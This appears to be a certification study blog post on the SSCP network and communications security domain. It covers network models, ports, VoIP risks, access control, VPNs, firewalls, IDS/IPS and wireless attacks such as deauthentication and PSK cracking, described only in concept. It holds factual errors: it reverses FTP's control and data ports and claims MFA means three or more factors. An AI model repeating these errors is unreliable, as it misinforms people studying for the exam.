The sixth domain in the SSCP CBK is Network and Communications Security. This domain accounts for 16% of the SSCP exam.
The Network and Communications Security domain defines six (6) tasks that a certified SSCP should be able to perform:
- Understand Security Issues Related to Networks
- Protect Telecommunications Technologies
- Control Network Access
- Manage LAN-Based Security
- Operate and Configure Network-Based Security Devices
- Implement and Operate Wireless Technologies
This is part 6 in a 7-part series on the (ISC)2 SSCP Common Body of Knowledge (CBK).
Remember: An SSCP who can recall this information will likely pass the exam, but the SSCP who can explain how these concepts are applied in real-world situations is more likely to get hired.
Understand Security Issues Related to Networks
Network and communications security, or protecting data in transit, it a pretty significant part of a cyber security professional’s job. If you’re going to protect data as it travels from point A to point B, you’ll need to know where the weak points might be.
One of the most common conceptual models for understanding network communications is the Open Systems Interconnection (OSI) model. The OSI model consists of seven (7) layers:
- Layer 1 – Physical
- Layer 2 – Data Link
- Layer 3 – Network
- Layer 4 – Transport
- Layer 5 – Session
- Layer 6 – Presentation
- Layer 7 – Application
Think of it this way…
When you sit down in front of your computer, you physically enter input using a device like a keyboard, mouse, or touchscreen. That input gets translated (link from physical to data, or data linked) to network data that is transported to some other computer. Once a session has been established, that data may be presented to someone on the other end through a different application. Otherwise, it might travel back down through the layers and written to physical disk.
Each point in the process where that data is translated to a different format represents (again, conceptually) a transition from one layer to another.
The TCP/IP model is similar, but simpler.
- Layer 1 – Link
- Layer 2 – Internet
- Layer 3 – Transport
- Layer 4 – Application
Regardless of which model you use, as SSCP should examine the controls at each layer to determine whether or not they’re reasonable and appropriate.
Network topologies refer to the different ways you can build a network . The most common topologies include:
- Ring
- Star
- Bus
- Mesh
- Tree
For an absolutely FANTASTIC description of these network topologies, check out this video from Professor Messer’s CompTIA Network+ course.
SSCP’s should also be familiar with commonly user network ports and protocols.
Specifically, you should recognize both the acronym and its corresponding port number. You should also know whether or not the protocol is inherently secure or insecure (i.e., unencrypted).
A few ports you should know:
- 20/21 – FTP (File Transfer Protocol; 20 is for control, 21 for data transfer)
- 22 – SSH (Secure Shell; remote command line, encrypted)
- 23 – Telnet (remote command line)
- 25 – SMTP (Simple Mail Transfer Protocol; email)
- 53 – DNS (Domain Name System; link hostnames to IP addresses)
- 80 – HTTP (Hypertext Transfer Protocol; web)
- 110 – POP (Post Office Protocol; email)
- 161/162 – SNMP (Simple Network Management Protocol; network management)
- 389 – LDAP (Lightweight Directory Access Protocol; user directories)
- 443 – HTTPS (HTTP over SSL/TLS; encrypted HTTP)
- 636 – LDAPS (LDAP over SSL/TLS; encrypted LDAP)
- 989/990 – FTPS (FTP over SSL/TLS; encrypted FTP)
Any protocol that doesn’t include encryption puts that data at risk while in transit, namely from a network sniffer (or a tool that can intercept and view that traffic). FTP and Telnet are notorious offenders.
If you want to understand network and communication security in practice, download Nmap and Wireshark and try them out on your home network. Nmap will help you identify network ports and protocols, and Wireshark will let you see a network sniffer in action.
Protect Telecommunications Technologies
Converged communications (or unified communications) refers to the combination of voice, video, and data communication, all on the same network.
It wasn’t that long ago that phone, media, and data networks were entirely separate: different protocols, different cables, different physical connectors. Phone cables were thinner than network cables, which were themselves thinner than the coaxial cables we plugged into the back of our television sets. Phone connectors (RJ11) and data connectors (RJ45) looked somewhat similar, but the coaxial connector looked very different.
Take a look at this voice/data/video (VDV) tester kit to see those differences.
When we started moving all of this technology to the TCP/IP network, we significantly improved the ability to manage and support this technology, not to mention the improvements to the user experience. Voice over IP (VoIP) became the new standard for voice communications, and we’ve continued to improve video and audio compression and transfer utilities, thanks in part to the popularity of services like YouTube and Netflix.
These new improvements were accompanied by new attacks and countermeasures.
Attackers running network sniffers have the ability to intercept and recreate video and voice calls that travel across the network, gaining access to any sensitive information exchanged during those sessions.
Converged networks often use the Session Initiation Protocol (SIP) to enable users to prove they are who they say they are before establishing voice and phone sessions. Attackers can exploit weaknesses in that protocol to identify valid SIP usernames and potentially hijack sessions and/or impersonate valid users. Instead of just eavesdropping on a conversation, an attack could begin controlling that conversation.
VoIP providers started deploying web-based administration interfaces for their new unified communication services. If a system administrator forgets to change the default admin password, and attacker can often find default admin credentials with a quick web search. Once an attacker has those credentials, that attacker can take full control of every VoIP phone managed by that application.
SSCP’s take time to analyze their converged networks for these (and similar) vulnerabilities. More importantly, SSCP’s educate network and system administrators on essential countermeasures to attacks against these technologies. Those countermeasures include (but aren’t limited to) the following:
- System hardening (e.g., strong passwords)
- Encryption (data in transit)
- Patch management
- Logging and monitoring for known attack signatures
Control Network Access
Ultimately, you can achieve effective network security by ensuring that your access control and monitoring techniques are in good working order.
The concept of network access control (NAC) is that you only allow devices on your network if they meet predefined security requirements. For example, is the device operating system fully patched? Is the endpoint running antivirus? Does the device contain a security certificate that was previously installed by a company administrator? The number of specific controls is up to you, based on your organization’s risk appetite and on the level of complexity you’re willing and able to support.
What happens when a non-compliant device attempts to connect? Ideally, that device should be placed in quarantine, a separate network (isolated from all other networks) where someone can examine the device more closely. Addressing the compliance issues (e.g., patching the operating system) is known as remediation. Once remediation is complete, you also need a process for moving that device from quarantine to the company network, a process known as admission.
Fortunately, a number of existing access control standards and protocols provide additional layers of security to help you ensure that unknown/unmanaged devices can’t access your network. A few of the most well-known are:
- IEEE 802.1X – Port-based NAC. When you connect a device to a network port, you have to authenticate (username/password, digital certificate, etc.) before you can access the network itself.
- RADIUS – Remote Authentication Dial-In User Service. You authenticate to the network, a device determines what you’re authorized to do, and a device accounts for what you do while connected. These three (3) elements together are often referred to as AAA, or Triple A). 802.1X implementations often relies on RADIUS.
- TACACS – Terminal Access Controller Access-Control System. You login to a central server first, and it decides what you’re allowed to access on the network. TACACS has been replaced with TACACS+.
You also need to account for remote access operation and configuration. In other words, how to users and administrators outside of the network (e.g., at home, traveling abroad) access network resources? Enabling workers to do their jobs while off-site is commonly known as telework.
Virtual private networks (VPN’s) are a commonplace solution to this challenge. Administrators configure a VPN concentrator to accept access requests from authorized users. Once they’ve successfully authenticated, the user experience is often very similar to what they would see if they were sitting at their desks.
These VPN connections were commonly established using Internet Protocol Security (IPSec), a protocol that provides both secure authentication and encryption. However, it is more common today to see organizations using SSL VPN’s to provide remote access via web browser.
Organizations that want to ensure both network connections and desktop applications are limited to the bare minimum may use thin clients to accomplish these goals. Thin clients are physical or virtual computers that rely on the back-end servers to do the heavy lifting, providing very few resources to the end user. If you’re using office applications (document editing, spreadsheet processing, etc.) that are installed on your workstation, you’re using a fat client. If that software is running on a server, chances are you’re using a thin client.
If an attacker knows that they can access an organization’s internal network remotely from anywhere in the world, you better believe that attacker will attempt to compromise those remote access portals. They might do this through brute force password guessing attacks, although more sophisticated attackers are likely to use password spraying attacks instead. If all else fails, social engineering a user into disclosing valid remote access credentials is a tried and true attack method.
Popular and effective countermeasures to these types of attacks include:
- Two Factor Authentication (2FA) – Usernames and passwords are something a user knows. We call that a single authentication factor. But what if we also required the user to have something, like a hardware or software token? By configuring our remote access portal to require two factors of authentication, we make it a lot harder for a remote attacker to login (since that attacker would need to compromise both authentication factors).
- Multifactor Authentication (MFA) – This is term that’s often (incorrectly) used in place of 2FA. MFA is similar, but more complex. MFA solutions add another authentication factor to the list, something like biometrics (something the user is) or location (somewhere the user is). Any combination of two (2) authentication factors is 2FA. Any combination of three (3) or more authentication factors is MFA.
- IP Whitelisting – If you know where the user is logging in from, you can whitelist that source IP address for remote access. If an attacker tries to login from any IP address that hasn’t been whitelisted, the network devices prohibit that action. This is VERY effective, although it can be much harder to maintain, especially for large organizations.
- Security Certificates – This is similar to a token (something the user has), except the user may not know about it at all. A user will often be able to see or touch a token, but a security certificate is usually installed by an administrator beforehand so a user doesn’t need to worry about it.
Manage LAN-Based Security
Network segmentation is the practice of dividing one large network into a number of smaller networks, and then putting controls in place to limit the traffic that can travel between those smaller networks. The Payment Card Industry (PCI), for example, requires that credit card data live on a network that has been segmented from less secure (untrusted) networks.
Segmentation often requires some hardware control, software control, or combination of the two to enforce security. You can use access control lists (ACL’s) in a firewall to explicitly define which hosts are allowed to communicate with each other, as well as which network ports on which those hosts are allowed to communicate. You might also consider virtual local area networks (VLAN’s), which are logical groupings of machines that may reside on different physical networks.
Taking it one step further, you should examine ways to enforce a separation of the data plane and the control plane. One common approach is to view the data plane as the network devices that data travels through, and the protocols used to conduct that traffic, and to view the control plane as the software you use to manage those devices and protocols. By separating the two, you make it harder for an attacker to compromise one without compromising both.
This underscores the need for secure device management practices and procedures. If an attacker can compromise an administrative interface or the administrative network traffic for just one network device, then the entire network is at risk of comprise. An attacker who can read sensitive simple network management protocol (SNMP) settings may find sensitive information that enables the attacker to compromise other devices on the same network. An attacker sniffing network traffic may intercept administrative credentials as they travel across the network via telnet, an unencrypted network protocol.
A combination of network segmentation and secure network device management make it that much harder for an attacker to find a foothold on an organization’s network.
Operate and Configure Network-Based Security Devices
A router is a network device that analyzes network traffic and determines the best path (or route) to get that traffic to its destination. A switch is a network device that performs a similar function, although it’s not as smart or complex as a router. While both devices are crucial to network operations, neither device is really a network security device.
One of the most common network security devices is a firewall. This devices sits between multiple network segments, acting like a traffic cop. When data attempts to travel from one network to another, the firewall checks its rules to determine whether or not that action is permitted. If so, the device allows the traffic to pass through to its destination. If not, the device rejects the traffic and prohibits that activity.
In both cases, an administrator may configure the firewall to log these attempts. Rejected traffic is often an indicator of an error, or possibly an attack, while permitted traffic may be useful during security incident response activities and forensics investigations.
A proxy intercepts network traffic between networks, often to expose certain systems or applications to authorized users without exposing everything on the more secure network. For example, you may have an application server on the internal network that you want external users to access. You could configure a proxy to only allow certain services (e.g., HTTP, HTTPS) while changing the IP address of that internal server. Why would you change the IP address? Because you don’t want an attacker to know your internal IP address scheme. An attacker with that knowledge could identify potential targets for an attack, as well as navigate the internal network more quickly (reducing the likelihood that your logging and monitoring controls might detect the attack activity).
It’s also worth noting that a number of organizations favor proxies over VPN’s. A properly implemented proxy is easier to deploy, easier to maintain, and arguably more secure than a VPN.
Two (2) types of additional network security devices worth noting are network intrusion detection systems (NIDS) and network intrusion prevention devices (NIPS). Both devices monitor network traffic for potentially malicious activity, but they respond differently. A NIDS device will log and event and/or alert an administrator, but it won’t do anything to to interfere with the traffic. A NIPS device will be more aggressive, automatically taking action to contain a potential threat.
Traffic-shaping devices (e.g., WAN optimization) attempt to speed up the network by prioritizing traffic and properly allocating bandwidth. This is good news for the users, but it may cause problems for the network security devices. Changes made by traffic-shaping devices can alter the information that security devices rely on in order to identify potentially malicious activity.
An SSCP should have an understanding of an organizations’ overall network architecture in order to better determine where to deploy network security devices and how those devices must be configured.
Implement and Operate Wireless Technologies
We’ve spent a lot time discussing wired networks, but it’s important that we discuss wireless networks as well.
Wireless networks are any network that transmits data over the air instead of a physical wire. Wait a minute, though. What about phone networks and Bluetooth? Technically, those are wireless, for the purposes of the SSCP exam, (ISC)2 wants you to focus on networks that operate using wireless routers in home and business networks.
Wireless networks rely on transmission security to ensure that the data is protected. An attacker on a wired network either needs ot be connected to that network or physically tapped into a network cable. A wireless network attacker just needs to be nearby.
Wireless transmission security options include:
- Open – No encryption or password. From a security standpoint, this is right out.
- WEP – Wired Equivalent Privacy. This was the industries first attempt at encrypting wireless data. Unfortunately, attackers figured out how to crack (or compromise) WEP very quickly. Today, WEP is roughly the same as Open: fundamentally insecure.
- WPA – Wi-Fi Protected Access. This was developed as a direct response to the WEP weaknesses. WPA uses Temporal Key Integrity Protocol (TKIP) to create a unique encryption key for every packet. Much harder to crack, but still possible.
- WPA2/802.11i – WPA2 added support for CCMP, and encryption protocol based on the Advanced Encryption Standard (AES). MUCH harder to crack.
- WPA3 – The latest and greatest, designed to be even more secure than WPA2.
One of the most popular wireless attacks is a man-in-the-middle attack. In this scenario, an attacker stands up a rogue access point (AP) and pretends to be a known/trusted network. Once a user connects to that rogue AP, the attacker can monitor and modify any of the traffic that passes through that device.
Attackers may also launch a denial of service (DoS) attack against a wireless network. In this scenario, an attacker may continually tell a connected wireless device to disconnect from a wireless access point. The end result is that the end user can’t access the wireless network at all.
Attackers can also exploit some of the same attack tools (Aircrack-ng is a perfect example) to force that disconnection once, and then intercept a copy of the encryption key when the wireless client connects again. Once an attacker has a copy of that key, the attacker can then attempt to brute force that key (often offline) in order to find the original, plaintext pre-shared key (PSK). With the PSK, an attacker may then be able to logon directly to the target wireless network.
Many of the wired security practices we’ve already discussed apply to wireless as well: system hardening, patching, locking down management interfaces, and so on. However, you may want to deploy a wireless security device as well.
Wireless security devices can either be dedicated (standalone) or integrated (baked into the wireless routers themselves). Dedicated devices may be preferable for environments with a high volume of wireless network traffic, since integrated devices need to time slice between providing wireless access to end users and performing security functions. Most (all?) integrated devices can only do one of these tasks at a time.
These devices are often categorized as either wireless intrusion detection systems (WIDS) or wireless intrusion prevention systems (WIPS). WIDS devices alert admins without stopping potentially bad traffic, while WIPS devices shut down bad traffic based on known attack patterns (signatures) or suspicious behavior.
WIPS devices sound like a great idea, until you start running into false positives. An improperly tuned or overly aggressive WIPS device can kick legitimate users off of the wireless network, doing as much harm as an actual attacker who launched a DoS attack. An SSCP takes time to weigh the pros and cons of WIDS versus WIPS devices, and then deploys the appropriate solution after carefully configuring and testing that device.
If you want to learn more about wireless security protocols, the Wikipedia article on Wi-Fi Protected Access is actually a fantastic primer. You can also visit the Wikipedia article on Wireless Security for an in-depth analysis of wireless attacks and countermeasures.
What Else Should I Know About Network and Communications Security?
This is a high level introduction to the concepts you need to know as an SSCP, based on the (ISC)2 SSCP Certification Exam Outline. It’s not intended to be a deep-dive into everything you need to know in order to pass the exam.
You’ll increase your chances of passing the exam the first time if you read these two (2) books next:
- Start with the SSCP All-in-One Exam Guide (2nd Edition).
- Then read the (ISC)2 SSCP Official Study Guide.
If you prefer videos to books, use our list of recommended online training providers to take advantage of FREE offers to help you prepare for the exam.
Keep at it!
SSCP Domain 5 – Cryptography | SSCP Domain 7 – Systems and Applications Security